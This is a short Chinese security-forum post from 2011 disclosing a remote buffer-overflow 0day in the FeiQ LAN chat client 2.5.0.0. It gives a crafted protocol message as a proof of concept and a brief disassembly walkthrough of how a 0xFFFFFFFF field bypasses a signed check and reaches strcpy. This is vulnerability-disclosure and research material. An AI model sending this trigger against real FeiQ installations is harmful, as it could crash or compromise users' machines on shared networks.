这是人生中的第一个0day,在此发表留个脚印,本漏洞发现于2011.11.21(昨天)。
飞秋是一款很流行的区域网聊天工具,很多校内网(我学校就用这个聊天的)和公司内部都在使用。
声明:本贴只用于学习交流,如使用本帖技术用于非法用途,后果自负。
测试版本:虚拟机中Windows XP SP3,飞秋版本为2.5.0.0。
漏洞分析:
POC:
1_lbt4_1#65664#6CF04987CC1A#570#31741#4294967295#2.5a:1317316152:admin:XXCCLI-A10D5C26:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.......
sub_4405A0为从ecx指向的字符串中提取出第五个和第六个#之间的字符串。
ecx指向的是:1#65664#6CF04987CC1A#570#31741#4294967295#2.5a:1317316152:admin:XXCCLI-A10D5C26:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.......
eax为输出地址,运行后var_4024为字符串4294967295(0xFFFFFFFF)
运行后var_4028位0xFFFFFFFF
绕过有符号比较,进入strcpy,esi指向AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.......
结果图:
- 标 题:飞秋远程可利用0day
- 作 者:artake
- 时 间:2011-11-22 10:09:11
- 链 接:http://bbs.pediy.com/showthread.php?t=143197